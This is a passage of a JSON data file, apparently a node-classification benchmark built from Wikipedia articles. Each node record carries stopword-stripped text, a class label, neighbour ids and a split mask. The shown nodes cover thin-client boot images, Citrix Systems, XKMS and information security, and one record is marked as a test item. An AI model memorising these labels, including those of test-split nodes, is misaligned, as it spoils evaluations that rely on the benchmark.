often bi-annual boot turn re-images many older off-spec machines new hardware deployed higher-end use procedure called cascading oldest hardware repurposed simpler software let continue use less demanding access-controlled applications subjects much rigorous control minimize number images total cost operations correlates strongly total number different images total number computers minimize number images requires additional discipline desktop computing increasingly relying web services making thin client approach viable departmental boot images may remain simply instantiate part semantic service-oriented architecture especially larger organizations service component architecture would simplify implementation control mechanisms especially single application language like java used custom applications enterprise importantly shift software service large vendors means applications tied machines number variant boot images required applications installed reduced open configuration technologies bitfrost openid even xmpp would also simplify configuration boot images authentication would longer dealt desktop/laptop device large system vendors increasingly provide dvds boot image standard machine shipped customer usually includes tools diagnose changes machine download drivers",
    "neighbors": [
      10020,
      11108,
      5677,
      3086,
      7983,
      5296,
      6514,
      467,
      10938,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 5371,
    "label": 7,
    "text": "Citrix_Systems:citrix systems citrix systems inc. american multinational software company provides server application desktop virtualization networking software service saas cloud computing technologies citrix solutions claimed use 400,000 clients worldwide including 99 fortune 100 98 fortune 500 company founded richardson texas 1989 ed iacobucci served chairman departure 2000 began developing remote access products microsoft operating systems licensing source code microsoft partnership company throughout history 1990s citrix came prominence industry leader thin client technology enabling purpose-built devices access remote servers resources company launched first initial public offering 1995 competitors experienced large revenue increases 1995 1999 citrix acquired sequoia software corp. 2001 expertcity provider remote desktop products 2003 followed dozen acquisitions 2005 2012 allowed citrix expand server desktop virtualization cloud computing infrastructure service software service offerings 2014 citrix acquired framehawk used technology improve delivery virtual desktops applications wireless networks 2016 part us 1.8 billion product deal logmein citrix spun goto product line new business entity entitled getgo 2017 citrix completed merger getgo logmein products citrix corporate headquarters fort lauderdale florida santa clara california subsidiary operations california massachusetts additional development centers australia canada denmark germany india united kingdom citrix january 2018 reported revenue continuing operations 2.82 billion fiscal year 2017 compared 2.74 billion fiscal year 2016 3 increase april 2017 company employed approximately 8,100 employees worldwide citrix founded richardson texas 1989 former ibm developer ed iacobucci 3 million funding following initial setup development iacobucci moved company former home coral springs florida company first employees five engineers ibm iacobucci convinced join team iacobucci served chairman company roger roberts became ceo citrix 1990 citrix originally named citrus changed name existing company claimed trademark rights citrix name portmanteau citrus unix company first product citrix multiuser extension os/2 developed two years citrix licensed os/2 source code microsoft developed independent computing architecture ica protocol citrix multiuser multiuser allowed multiple users working separate computers remote access software server even computers built run os/2 three days product launched 1991 microsoft announced would switching os/2 windows switch made multiuser nearly unusable without significant changes make compatible windows dos company discussed closing 1991 investments intel microsoft kleiner perkins caufield byers among others allowed company work new version multiuser multi-win version 2.0 released 1992 compatible dos applications allowed five users 1993 citrix released new remote applications server winview ability run dos windows applications 1994 company yearly revenue equaled us 10 million company launched winframe multi-user operating system based microsoft windows nt 1995 new product allowed 15 users first thin client windows citrix initial public offering december 1995 company share price doubled 15 30 mid-1990s citrix became leader growing industry competitors company revenues doubled year year 1995 1999 following weeks discussions iacobucci able persuade microsoft agree license citrix technology windows nt server 4.0 resulted windows terminal server edition 1998 agreement allowed citrix keep position marketplace nt 4.0 compatible citrix also earned 75 million agreement along royalty arrangement valued approximately 100 million citrix released metaframe 1.0 conjunction terminal server edition due weaknesses microsoft remote desktop protocol rdp terminal server edition worked best using ica protocol developed citrix found metaframe meant citrix technology purchased installed machines running terminal server edition 1997 company opened new headquarters fort lauderdale florida also opened offices sydney london paris year 1998 mark templeton became ceo citrix serving vice president marketing also 1998 licensed ica protocol ibm key tronics citrix licensed ica protocol motorola use digital wireless handsets 1999 1999 thin-client model citrix used became software trend company customers increased 15 million major clients included sears chevron sudden drop stocks 2000 led iacobucci leaving company ceo mark templeton demoted president senior executive officer templeton later reinstated 2001 2001 citrix acquired sequoia software corp. 185 million year released metaframe xp new platform using metaframe technology later rebranded citrix presentation server 2005 july 9 2002 citrix announced 10 job cut time company employed 1,900 workers announcement stock hit five-year low citrix acquired expertcity provider remote desktop products december 2003 225 million cash stock acquisition largest company date acquisition citrix gained expertcity existing products gotomypc gotoassist expertcity became citrix online division company 2004 company introduced citrix gotomeeting 2005 2012 company acquired dozen companies allowed expand new markets citrix acquired acceleration hardware maker netscaler 2005 allowed company offer optimized application delivery company entered server desktop virtualization market purchase xensource august 2007 citrix expanded cloud infrastructure service iaas offerings august 2010 acquisition vmlogix february 2011 citrix entered european software service saas market acquisition netviewer 2007 company opened headquarters silicon valley 2008 company changed name presentation server product line xenapp also 2008 citrix announced expanded alliance microsoft desktop virtualization solutions january 29 2009 citrix announced 460 employee positions would cut comprising 10 workforce august 2010 citrix announced partnership google bring company products chrome os devices july 14 2015 citrix added full support windows 10 desktop virtualization products company became leader iaas acquisition cloud.com provider cloud infrastructure companies july 2011 citrix began offering vdi-in-a-box small medium businesses acquisition kaviza may 2011 company acquired technology cloud-based file sharing storage purchase sharefile october 2011 may 2012 citrix acquired virtual computer maker intelligent desktop virtualization technology used company xenclient enterprise edition citrix entered mobile video telecom markets june 2012 company acquired bytemobile also 2012 company acquired zenprise zenprise mobile application management mam technology released xenmobile february 2013 citrix acquired framehawk january 2014 order use company technology improve delivery virtual desktops applications wireless networks including cellular speed quality may poor may 2014 citrix acquired scalextreme bolster cloud capabilities core business unit xendesktop xenapp auto scaling patching automation complex deployments cloud january 29 2015 citrix announced 700 full-time 200 contractor positions would eliminated constituted 10 workforce cuts expected save 90 100 million year two hundred layoffs occurred fort lauderdale florida company headquartered company 10,081 employees february 2015 december 2015 citrix employed approximately 9,500 people noted november restructure due eliminate nearly 700 full-time jobs december 31 2018 citrix approximately 8,200 employees citrix reported net income 251.7 million 2014 339.5 million 2013 july 2015 company announced several changes board directors including robert calderoni becoming executive chairman adding jesse cohn senior partner activist hedge fund elliott management month company announced president ceo mark templeton would retire replacement found october 21 company named executive chairman robert calderoni interim president ceo january 2016 kirill tatarinov former microsoft executive named president ceo citrix joined company board calderoni remained executive chairman board july 2016 part deal boston-based saas company logmein citrix announced spun goto product line included gotomeeting gotowebinar gotowebcast gototraining gotoassist gotomypc wholly owned subsidiary called getgo february 2017 citrix completed merger getgo became subsidiary logmein transaction valued approximately 1.8 billion david henshall became company ceo july 2017 also 2017 citrix expanded partnership google may google announced would add support run citrix xenapp chrome web browser including graphics processing unit acceleration july companies announced working allow citrix cloud deploy virtualized apps desktops google cloud october 2017 citrix told regulators plans lay staff across functions consolidate offices fall 2017 2018 company carried layoffs raleigh north carolina office closures santa barbara california tempe arizona citrix unveiled citrix analytics security software 2017 citrix synergy conference orlando florida may 2017 software detects responds security threats relying artificial intelligence 2018 citrix changed names products represent shift cloud operating model company stated made name changes present unified product line end users create manage deploy workspaces apps data single console company dropped xen netscaler brand names xenapp xendesktop became citrix virtual apps desktops xenmobile became citrix endpoint management sharefile integration became citrix content collaboration xenserver became citrix hypervisor cedexis became citrix intelligent traffic management netscaler products kept identities yet netscaler brand name replaced citrix citrix governed ten member board directors citrix headquarters fort lauderdale florida santa clara california united states offices california north carolina citrix research development centers located u.s. australia india japan greece united kingdom citrix organized three units workspace services delivery network mobility apps citrix licenses services products directly clients including professionals smes companies called value-added resellers resell products services adding additional features citrix publicly traded ticker symbol ctxs 2014 company ranked 741 fortune 1000 1,793 forbes global 2000 citrix revenue 2015 equaled us 3.28 billion increase 3.14 billion 2014 2.91 billion 2013 citrix expanded added new technologies services number mergers acquisitions first acquisition datapac 1997 citrix purchased order utilize datapac technology position asia-pacific region major acquisitions include expertcity 2004 netscaler 2005 xensource 2007 sharefile 2011 2015 citrix acquired nearly 50 companies november 2018 citrix paid 200m acquire sapho software startup develops micro apps workers citrix creates software allows individuals enterprise work collaborate remotely regardless device network main areas company works desktop apps desktop service daas networking cloud software service saas citrix offers number products related desktop application virtualization tools allow access windows desktops applications independently machine actually device operating system citrix xenapp provides application virtualization integrated part xendesktop citrix xendesktop citrix vdi-in-a-box xenclient provide desktop virtualization desktopplayer mac allows online offline access windows virtual desktops macs citrix workspace cloud platform building delivering desktops applications cloud sharefile allows companies organizations sync share files xenmobile offers mobile app device management citrix receiver client software allows universal access virtual applications desktops appdna software provides application migration management citrix technology enables service providers provide desktop service daas offerings customers including business apps desktops products include worx mobile apps secure email browser document sharing citrix workspace suite mobile workspaces citrix products related cloud computing networking include citrix xenserver server virtualization netscaler brand network appliances including wan optimization devices software-defined wan delivery equipment application delivery controllers adc gateways appfirewall web application firewall managed cloud management software citrix cloud company also bytemobile adaptive traffic management aims optimize mobile video services traffic management policy control caching bytemobile insight provides mobile data subscriber analytics citrix software service saas products focused collaboration communications offerings include podio cloud-based collaboration service openvoice provides audio conferencing company philanthropic activities include corporate giving—such corporate donations in-kind gifts—and employee match programs addition citrix employees allowed take two paid volunteer days year participate company annual global day impact —an event encourages citrix employees volunteer local communities near fort lauderdale headquarters citrix provided business training non-profit teams particular company helped local non-profit organization launch computer wheels offer training low-income neighborhoods 2007 company connected broward county florida neighborhood agogo ghana donated technology training furthermore company raleigh office began program called project code 2014 leads youth local boys girls clubs coding exercises teaches computer science addition philanthropic activities citrix donated open-source technology non-profit software organizations continue development gain contributors citrix gave cloudstack apache foundation 2012 xen hypervisor linux foundation 2013",
    "neighbors": [
      9863,
      4490,
      7563,
      7820,
      2189,
      6797,
      5371,
      8976,
      5394,
      8466,
      2201,
      1948,
      10782,
      5535,
      8865,
      2339,
      3235,
      11301,
      4011,
      6318,
      7983,
      10926,
      10417,
      1970,
      6834,
      2228,
      9655,
      10747,
      10809,
      5178,
      5437,
      8515,
      11333,
      1350,
      2118,
      11463,
      9929,
      331,
      3660,
      1745,
      467,
      724,
      7891,
      7382,
      1239,
      8921,
      11097,
      8668,
      2399,
      11104,
      9569,
      4194,
      5732,
      10085,
      998,
      9449,
      2028,
      5612,
      3822,
      624,
      4977,
      6521,
      3323,
      11646,
      9855
    ],
    "mask": "Test"
  },
  {
    "node_id": 5372,
    "label": 4,
    "text": "XKMS:xkms xml key management specification xkms uses web services framework make easier developers secure inter-application communication using public key infrastructure pki xml key management specification protocol developed w3c describes distribution registration public keys services access xkms compliant server order receive updated key information encryption authentication xkms consists two parts x-krss defines protocols needed register public key information x-krss generate key material making key recovery easier created manually x-kiss outlines syntax applications use delegate tasks needed process key information element xml signature trust service cases goal xkms allow complexity traditional pki implementations offloaded client external service approach originally suggested diffie hellman new directions paper generally considered impractical time leading commercial development focusing certificate based approach proposed loren kohnfelder team developed original xkms proposal submitted w3c included warwick ford phillip hallam-baker editor brian lamacchia architectural approach closely related mit pgp key server originally created maintained brian lamacchia realization xml closely related saml first edition also edited hallam-baker time xkms proposed security infrastructure defined entirely new soap protocol web services result large part xkms specification concerned definition security 'bindings specific web services protocols",
    "neighbors": [
      10020,
      5254,
      8459,
      3629,
      10831,
      8468,
      10486,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 5373,
    "label": 4,
    "text": "Information_security:information security information security sometimes shortened infosec practice protecting information mitigating information risks part information risk management typically involves preventing least reducing probability unauthorized/inappropriate access use disclosure disruption deletion/destruction corruption modification inspection recording devaluation although may also involve reducing adverse impacts incidents information may take form e.g electronic physical. tangible e.g paperwork intangible e.g knowledge information security primary focus balanced protection confidentiality integrity availability data also known cia triad maintaining focus efficient policy implementation without hampering organization productivity largely achieved structured risk management process involves standardize discipline academics professionals collaborate offer guidance policies industry standards password antivirus software firewall encryption software legal liability security awareness training forth standardization may driven wide variety laws regulations affect data accessed processed stored transferred destroyed however implementation standards guidance within entity may limited effect culture continual improvement n't adopted core information security information assurance act maintaining confidentiality integrity availability cia information ensuring information compromised way critical issues arise issues include limited natural disasters computer/server malfunction physical theft paper-based business operations still prevalent requiring set information secuy practices enterprise digital initiatives increasingly emphasized information assurance typically dealt information technology security specialists specialists apply information security technology often form computer system worthwhile note computer necessarily mean home desktop computer device processor memory devices range non-networked standalone devices simple calculators networked mobile computing devices smartphones tablet computers security specialists almost always found major enterprise/establishment due nature value data within larger businesses responsible keeping technology within company secure malicious cyber attacks often attempt acquire critical private information gain control internal systems field information security grown evolved significantly recent years offers many areas specialization including securing networks allied infrastructure securing applications databases security testing information systems auditing business continuity planning electronic record discovery digital forensics information security professionals stable employment 80 percent professionals change employer employment period year number professionals projected continuously grow 11 percent annually 2014 2019 information security threats come many different forms common threats today software attacks theft intellectual property identity theft theft equipment information sabotage information extortion people experienced software attacks sort viruses worms phishing attacks trojan horses common examples software attacks theft intellectual property also extensive issue many businesses information technology field identity theft attempt act someone else usually obtain person personal information take advantage access vital information social engineering theft equipment information becoming prevalent today due fact devices today mobile prone theft also become far desirable amount data capacity increases sabotage usually consists destruction organization website attempt cause loss confidence part customers information extortion consists theft company property information attempt receive payment exchange returning information property back owner ransomware many ways help protect attacks one functional precautions conduct periodical user awareness number one threat organisation users internal employees also called insider threats governments military corporations financial institutions hospitals non-profit organisations private businesses amass great deal confidential information employees customers products research financial status confidential information business customers finances new product line fall hands competitor black hat hacker business customers could suffer widespread irreparable financial loss well damage company reputation business perspective information security must balanced cost gordon-loeb model provides mathematical economic approach addressing concern individual information security significant effect privacy viewed differently various cultures possible responses security threat risk since early days communication diplomats military commanders understood necessary provide mechanism protect confidentiality correspondence means detecting tampering julius caesar credited invention caesar cipher c. 50 b.c. created order prevent secret messages read message fall wrong hands however part protection achieved application procedural handling controls sensitive information marked indicate protected transported trusted persons guarded stored secure environment strong box postal services expanded governments created official organizations intercept decipher read reseal letters e.g. u.k. secret office founded 1653 mid-nineteenth century complex classification systems developed allow governments manage information according degree sensitivity example british government codified extent publication official secrets act 1889 time first world war multi-tier classification systems used communicate information various fronts encouraged greater use code making breaking sections diplomatic military headquarters encoding became sophisticated wars machines employed scramble unscramble information volume information shared allied countries second world war necessitated formal alignment classification systems procedural controls arcane range markings evolved indicate could handle documents usually officers rather enlisted troops stored increasingly complex safes storage facilities developed enigma machine employed germans encrypt data warfare successfully decrypted alan turing regarded striking example creating using secured information procedures evolved ensure documents destroyed properly failure follow procedures led greatest intelligence coups war e.g. capture u-570 end twentieth century early years twenty-first century saw rapid advancements telecommunications computing hardware software data encryption availability smaller powerful less expensive computing equipment made electronic data processing within reach small business home user computers quickly became interconnected internet rapid growth widespread use electronic data processing electronic business conducted internet along numerous occurrences international terrorism fueled need better methods protecting computers information store process transmit academic disciplines computer security information assurance emerged along numerous professional organizations sharing common goals ensuring security reliability information systems various definitions information security suggested summarized different sources cia triad confidentiality integrity availability heart information security members classic infosec triad—confidentiality integrity availability—are interchangeably referred literature security attributes properties security goals fundamental aspects information criteria critical information characteristics basic building blocks however debate continues whether cia triad sufficient address rapidly changing technology business requirements recommendations consider expanding intersections availability confidentiality well relationship security privacy principles accountability sometimes proposed pointed issues non-repudiation fit well within three core concepts 1992 revised 2002 oecd guidelines security information systems networks proposed nine generally accepted principles awareness responsibility response ethics democracy risk assessment security design implementation security management reassessment building upon 2004 nist engineering principles information technology security proposed 33 principles derived guidelines practices 1998 donn parker proposed alternative model classic cia triad called six atomic elements information elements confidentiality possession integrity authenticity availability utility merits parkerian hexad subject debate amongst security professionals 2011 open group published information security management standard o-ism3 standard proposed operational definition key concepts security elements called security objectives related access control 9 availability 3 data quality 1 compliance technical 4 2009 dod software protection initiative released three tenets cybersecurity system susceptibility access flaw capability exploit flaw neither models widely adopted information security confidentiality property information made available disclosed unauthorized individuals entities processes similar privacy two words n't interchangeable rather confidentiality component privacy implements protect data unauthorized viewers examples confidentiality electronic data compromised include laptop theft password theft sensitive emails sent incorrect individuals information security data integrity means maintaining assuring accuracy completeness data entire lifecycle means data modified unauthorized undetected manner thing referential integrity databases although viewed special case consistency understood classic acid model transaction processing information security systems typically provide message integrity alongside confidentiality information system serve purpose information must available needed means computing systems used store process information security controls used protect communication channels used access must functioning correctly high availability systems aim remain available times preventing service disruptions due power outages hardware failures system upgrades ensuring availability also involves preventing denial-of-service attacks flood incoming messages target system essentially forcing shut realm information security availability often viewed one important parts successful information security program ultimately end-users need able perform job functions ensuring availability organization able perform standards organization stakeholders expect involve topics proxy configurations outside web access ability access shared drives ability send emails executives oftentimes understand technical side information security look availability easy fix often requires collaboration many different organizational teams network operations development operations incident response policy/change management successful information security team involves many different key roles mesh align cia triad provided effectively law non-repudiation implies one intention fulfill obligations contract also implies one party transaction deny received transaction party deny sent transaction important note technology cryptographic systems assist non-repudiation efforts concept core legal concept transcending realm technology instance sufficient show message matches digital signature signed sender private key thus sender could sent message nobody else could altered transit data integrity alleged sender could return demonstrate digital signature algorithm vulnerable flawed allege prove signing key compromised fault violations may may lie sender assertions may may relieve sender liability assertion would invalidate claim signature necessarily proves authenticity integrity sender may repudiate message authenticity integrity pre-requisites non-repudiation certified information systems auditor cisa review manual 2006 provides following definition risk management risk management process identifying vulnerabilities threats information resources used organization achieving business objectives deciding countermeasures take reducing risk acceptable level based value information resource organization two things definition may need clarification first process risk management ongoing iterative process must repeated indefinitely business environment constantly changing new threats vulnerabilities emerge every day second choice countermeasures controls used manage risks must strike balance productivity cost effectiveness countermeasure value informational asset protected risk analysis risk evaluation processes limitations since security incidents occur emerge context rarity uniqueness give rise unpredictable threats analysis phenomena characterized breakdowns surprises side-effects requires theoretical approach able examine interpret subjectively detail incident risk likelihood something bad happen causes harm informational asset loss asset vulnerability weakness could used endanger cause harm informational asset threat anything man-made act nature potential cause harm likelihood threat use vulnerability cause harm creates risk threat use vulnerability inflict harm impact context information security impact loss availability integrity confidentiality possibly losses lost income loss life loss real property pointed possible identify risks possible eliminate risk remaining risk called residual risk risk assessment carried team people knowledge specific areas business membership team may vary time different parts business assessed assessment may use subjective qualitative analysis based informed opinion reliable dollar figures historical information available analysis may use quantitative analysis research shown vulnerable point information systems human user operator designer human iso/iec 27002:2005 code practice information security management recommends following examined risk assessment broad terms risk management process consists given risk management choose accept risk based upon relative low value asset relative low frequency occurrence relative low impact business leadership may choose mitigate risk selecting implementing appropriate control measures reduce risk cases risk transferred another business buying insurance outsourcing another business reality risks may disputed cases leadership may choose deny risk selecting implementing proper security controls initially help organization bring risk acceptable levels control selection follow based risk assessment controls vary nature fundamentally ways protecting confidentiality integrity availability information iso/iec 27001 defined controls different areas organizations implement additional controls according requirement organization iso/iec 27002 offers guideline organizational information security standards administrative controls consist approved written policies procedures standards guidelines administrative controls form framework running business managing people inform people business run day-to-day operations conducted laws regulations created government bodies also type administrative control inform business industry sectors policies procedures standards guidelines must followed – payment card industry data security standard pci dss required visa mastercard example examples administrative controls include corporate security policy password policy hiring policies disciplinary policies administrative controls form basis selection implementation logical physical controls logical physical controls manifestations administrative controls paramount importance logical controls also called technical controls use software data monitor control access information computing systems passwords network host-based firewalls network intrusion detection systems access control lists data encryption examples logical controls important logical control frequently overlooked principle least privilege requires individual program system process granted access privileges necessary perform task blatant example failure adhere principle least privilege logging windows user administrator read email surf web violations principle also occur individual collects additional access privileges time happens employees job duties change employees promoted new position employees transferred another department access privileges required new duties frequently added onto already existing access privileges may longer necessary appropriate physical controls monitor control environment work place computing facilities also monitor control access facilities include doors locks heating air conditioning smoke fire alarms fire suppression systems cameras barricades fencing security guards cable locks etc separating network workplace functional areas also physical controls important physical control frequently overlooked separation duties ensures individual complete critical task example employee submits request reimbursement also able authorize payment print check applications programmer also server administrator database administrator roles responsibilities must separated one another information security must protect information throughout lifespan initial creation information final disposal information information must protected motion rest lifetime information may pass many different information processing systems many different parts information processing systems many different ways information information systems threatened fully protect information lifetime component information processing system must protection mechanisms building layering overlapping security measures called defense depth contrast metal chain famously strong weakest link defense depth strategy aims structure one defensive measure fail measures continue provide protection recall earlier discussion administrative controls logical controls physical controls three types controls used form basis upon build defense depth strategy approach defense depth conceptualized three distinct layers planes laid one top additional insight defense depth gained thinking forming layers onion data core onion people next outer layer onion network security host-based security application security forming outermost layers onion perspectives equally valid provides valuable insight implementation good defense depth strategy important aspect information security risk management recognizing value information defining appropriate procedures protection requirements information information equal information requires degree protection requires information assigned security classification first step information classification identify member senior management owner particular information classified next develop classification policy policy describe different classification labels define criteria information assigned particular label list required security controls classification factors influence classification information assigned include much value information organization old information whether information become obsolete laws regulatory requirements also important considerations classifying information information systems audit control association isaca business model information security also serves tool security professionals examine security systems perspective creating environment security managed holistically allowing actual risks addressed type information security classification labels selected used depend nature organization examples employees organization well business partners must trained classification schema understand required security controls handling procedures classification classification particular information asset assigned reviewed periodically ensure classification still appropriate information ensure security controls required classification place followed right procedures access protected information must restricted people authorized access information computer programs many cases computers process information must also authorized requires mechanisms place control access protected information sophistication access control mechanisms parity value information protected sensitive valuable information stronger control mechanisms need foundation access control mechanisms built start identification authentication access control generally considered three steps identification authentication authorization identification assertion someone something person makes statement hello name john doe making claim however claim may may true john doe granted access protected information necessary verify person claiming john doe really john doe typically claim form username entering username claiming person username belongs authentication act verifying claim identity john doe goes bank make withdrawal tells bank teller john doe claim identity bank teller asks see photo id hands teller driver license bank teller checks license make sure john doe printed compares photograph license person claiming john doe photo name match person teller authenticated john doe claimed similarly entering correct password user providing evidence he/she person username belongs three different types information used authentication strong authentication requires providing one type authentication information two-factor authentication username common form identification computer systems today password common form authentication usernames passwords served purpose increasingly inadequate usernames passwords slowly replaced supplemented sophisticated authentication mechanisms time-based one-time password algorithms person program computer successfully identified authenticated must determined informational resources permitted access actions allowed perform run view create delete change called authorization authorization access information computing services begins administrative policies procedures policies prescribe information computing services accessed conditions access control mechanisms configured enforce policies different computing systems equipped different kinds access control mechanisms may even offer choice different access control mechanisms access control mechanism system offers based upon one three approaches access control may derived combination three approaches non-discretionary approach consolidates access control centralized administration access information resources usually based individuals function role organization tasks individual must perform discretionary approach gives creator owner information resource ability control access resources mandatory access control approach access granted denied basing upon security classification assigned information resource examples common access control mechanisms use today include role-based access control available many advanced database management systems simple file permissions provided unix windows operating systems group policy objects provided windows network systems kerberos radius tacacs simple access lists used many firewalls routers effective policies security controls must enforceable upheld effective policies ensure people held accountable actions u.s. treasury guidelines systems processing sensitive proprietary information example states failed successful authentication access attempts must logged access information must leave type audit trail also need-to-know principle needs effect talking access control principle gives access rights person perform job functions principle used government dealing difference clearances even though two employees different departments top-secret clearance must need-to-know order information exchanged within need-to-know principle network administrators grant employee least amount privileges prevent employees accessing supposed need-to-know helps enforce confidentiality-integrity-availability triad need-to-know directly impacts confidential area triad information security uses cryptography transform usable information form renders unusable anyone authorized user process called encryption information encrypted rendered unusable transformed back original usable form authorized user possesses cryptographic key process decryption cryptography used information security protect information unauthorized accidental disclosure information transit either electronically physically information storage cryptography provides information security useful applications well including improved authentication methods message digests digital signatures non-repudiation encrypted network communications older less secure applications telnet file transfer protocol ftp slowly replaced secure applications secure shell ssh use encrypted network communications wireless communications encrypted using protocols wpa/wpa2 older less secure wep wired communications itu‑t g.hn secured using aes encryption x.1035 authentication key exchange software applications gnupg pgp used encrypt data files email cryptography introduce security problems implemented correctly cryptographic solutions need implemented using industry-accepted solutions undergone rigorous peer review independent experts cryptography length strength encryption key also important consideration key weak short produce weak encryption keys used encryption decryption must protected degree rigor confidential information must protected unauthorized disclosure destruction must available needed public key infrastructure pki solutions address many problems surround key management terms reasonable prudent person due care due diligence used fields finance securities law many years recent years terms found way fields computing information security u.s. federal sentencing guidelines make possible hold corporate officers liable failing exercise due care due diligence management information systems business world stockholders customers business partners governments expectation corporate officers run business accordance accepted business practices compliance laws regulatory requirements often described reasonable prudent person rule prudent person takes due care ensure everything necessary done operate business sound business principles legal ethical manner prudent person also diligent mindful attentive ongoing due care business field information security harris offers following definitions due care due diligence due care steps taken show company taken responsibility activities take place within corporation taken necessary steps help protect company resources employees nowiki due diligence /nowiki continual activities make sure protection mechanisms continually maintained operational attention made two important points definitions first due care steps taken show means steps verified measured even produce tangible artifacts second due diligence continual activities means people actually things monitor maintain protection mechanisms activities ongoing organizations responsibility practicing duty care applying information security duty care risk analysis standard docra provides principles practices evaluating risk considers parties could affected risks docra helps evaluate safeguards appropriate protecting others harm presenting reasonable burden increased data breach litigation companies must balance security controls compliance mission software engineering institute carnegie mellon university publication titled governing enterprise security ges implementation guide defines characteristics effective security governance include incident response plan group policies dictate organizations reaction cyber attack security breach identified plan initiated important note legal implications data breach knowing local federal laws critical every plan unique needs organization involve skill set part team example lawyer may included response plan help navigate legal implications data breach mentioned every plan unique plans include following good preparation includes development incident response team skills need used team would penetration testing computer forensics network security etc team also keep track trends cybersecurity modern attack strategies training program end users important well modern attack strategies target users network part incident response plan identifies security event end user reports information admin notices irregularities investigation launched incident log crucial part step members team updating log ensure information flows fast possible identified security breach occurred next step activated phase irt works isolate areas breach took place limit scope security event phase important preserve information forensically analyzed later process containment could simple physically containing server room complex segmenting network allow spread virus threat identified removed affected systems could include using deleting malicious files terminating compromised accounts deleting components events require step however important fully understand event moving step help ensure threat completely removed stage systems restored back original operation stage could include recovery data changing user access information updating firewall rules policies prevent breach future executing step system could still vulnerable future security threats step information gathered process used make future decisions security step crucial ensure future events prevented using information train admins critical process step also used process information distributed entities experienced security event change management formal process directing controlling alterations information processing environment includes alterations desktop computers network servers software objectives change management reduce risks posed changes information processing environment improve stability reliability processing environment changes made objective change management prevent hinder necessary changes implemented change information processing environment introduces element risk even apparently simple changes unexpected effects one management many responsibilities management risk change management tool managing risks introduced changes information processing environment part change management process ensures changes implemented inopportune times may disrupt critical business processes interfere changes implemented every change needs managed kinds changes part everyday routine information processing adhere predefined procedure reduces overall level risk processing environment creating new user account deploying new desktop computer examples changes generally require change management however relocating user file shares upgrading email server pose much higher level risk processing environment normal everyday activity critical first steps change management defining change communicating definition b defining scope change system change management usually overseen change review board composed representatives key business areas security networking systems administrators database administration application developers desktop support help desk tasks change review board facilitated use automated work flow application responsibility change review board ensure organization documented change management procedures followed change management process follows change management procedures simple follow easy use greatly reduce overall risks created changes made information processing environment good change management procedures improve overall quality success changes implemented accomplished planning peer review documentation communication iso/iec 20000 visible ops handbook implementing itil 4 practical auditable steps full book summary information technology infrastructure library provide valuable guidance implementing efficient effective change management program information security business continuity management bcm concerns arrangements aiming protect organization critical business functions interruption due incidents least minimize effects bcm essential organization keep technology business line current threats continuation business usual bcm included organizations risk analysis plan ensure necessary business functions need keep going event type threat business function encompasses whereas bcm takes broad approach minimizing disaster-related risks reducing probability severity incidents disaster recovery plan drp focuses specifically resuming business operations quickly possible disaster disaster recovery plan invoked soon disaster occurs lays steps necessary recover critical information communications technology ict infrastructure disaster recovery planning includes establishing planning group performing risk assessment establishing priorities developing recovery strategies preparing inventories documentation plan developing verification criteria procedure lastly implementing plan partial listing governmental laws regulations various parts world significant effect data processing information security important industry sector regulations also included significant impact information security describing simply security aware employees information security culture ideas customs social behaviors organization impact information security positive negative ways cultural concepts help different segments organization work effectively work effectiveness towards information security within organization way employees think feel security actions take big impact information security organizations roer petric 2017 identify seven core dimensions information security culture organizations andersson reimers 2014 found employees often see part organization information security effort often take actions ignore organizational information security best interests research shows information security culture needs improved continuously information security culture analysis change authors commented never ending process cycle evaluation change maintenance manage information security culture five steps taken pre-evaluation strategic planning operative planning implementation post-evaluation international organization standardization iso consortium national standards institutes 157 countries coordinated secretariat geneva switzerland iso world largest developer standards iso 15443 information technology – security techniques – framework security assurance iso/iec 27002 information technology – security techniques – code practice information security management iso-20000 information technology – service management iso/iec 27001 information technology – security techniques – information security management systems – requirements particular interest information security professionals us national institute standards technology nist non-regulatory federal agency within u.s. department commerce nist computer security division develops standards metrics tests validation programs well publishes standards guidelines increase secure planning implementation management operation nist also custodian u.s. federal information processing standard publications fips internet society professional membership society 100 organizations 20,000 individual members 180 countries provides leadership addressing issues confront future internet organizational home groups responsible internet infrastructure standards including internet engineering task force ietf internet architecture board iab isoc hosts requests comments rfcs includes official internet protocol standards rfc-2196 site security handbook information security forum isf global nonprofit organization several hundred leading organizations financial services manufacturing telecommunications consumer goods government areas undertakes research information security practices offers advice biannual standard good practice detailed advisories members institute information security professionals iisp independent non-profit body governed members principal objective advancing professionalism information security practitioners thereby professionalism industry whole institute developed iisp skills framework framework describes range competencies expected information security information assurance professionals effective performance roles developed collaboration private public sector organizations world-renowned academics security leaders german federal office information security german bundesamt für sicherheit der informationstechnik bsi bsi-standards 100-1 100-4 set recommendations including methods processes procedures approaches measures relating information security bsi-standard 100-2 it-grundschutz methodology describes information security management implemented operated standard includes specific guide baseline protection catalogs also known it-grundschutz catalogs 2005 catalogs formerly known baseline protection manual catalogs collection documents useful detecting combating security-relevant weak points environment cluster collection encompasses september 2013 4,400 pages introduction catalogs it-grundschutz approach aligned iso/iec 2700x family european telecommunications standards institute standardized catalog information security indicators headed industrial specification group isg isi",
    "neighbors": [
      2050,
      5636,
      10245,
      7174,
      10756,
      9224,
      7692,
      9745,
      4626,
      10772,
      4119,
      7703,
      5658,
      3612,
      1567,
      34,
      2084,
      6698,
      3629,
      7725,
      5169,
      7739,
      8764,
      4159,
      9791,
      9281,
      3139,
      4163,
      1093,
      2118,
      8262,
      8264,
      7753,
      10307,
      5195,
      589,
      10831,
      5200,
      4689,
      4691,
      10835,
      10329,
      8283,
      10331,
      10332,
      4193,
      1634,
      7778,
      612,
      7780,
      4198,
      9313,
      10341,
      107,
      3698,
      3700,
      3701,
      5749,
      119,
      5752,
      5245,
      5246,
      9345,
      2690,
      10372,
      8329,
      9356,
      4749,
      5774,
      4242,
      5780,
      2709,
      8343,
      10392,
      665,
      10909,
      3742,
      7327,
      161,
      2213,
      11429,
      1709,
      1711,
      176,
      2737,
      7855,
      691,
      4275,
      2229,
      6326,
      7348,
      8881,
      9392,
      10417,
      10426,
      9404,
      10940,
      2750,
      3262,
      3774,
      2756,
      197,
      7364,
      9926,
      7368,
      9929,
      3786,
      10437,
      9932,
      5325,
      10955,
      11474,
      2262,
      2263,
      6360,
      10968,
      731,
      8927,
      11487,
      9954,
      1251,
      2275,
      6373,
      743,
      5353,
      5866,
      3309,
      239,
      1776,
      3825,
      2804,
      2294,
      6903,
      5880,
      10492,
      2818,
      6406,
      1801,
      4873,
      7436,
      7437,
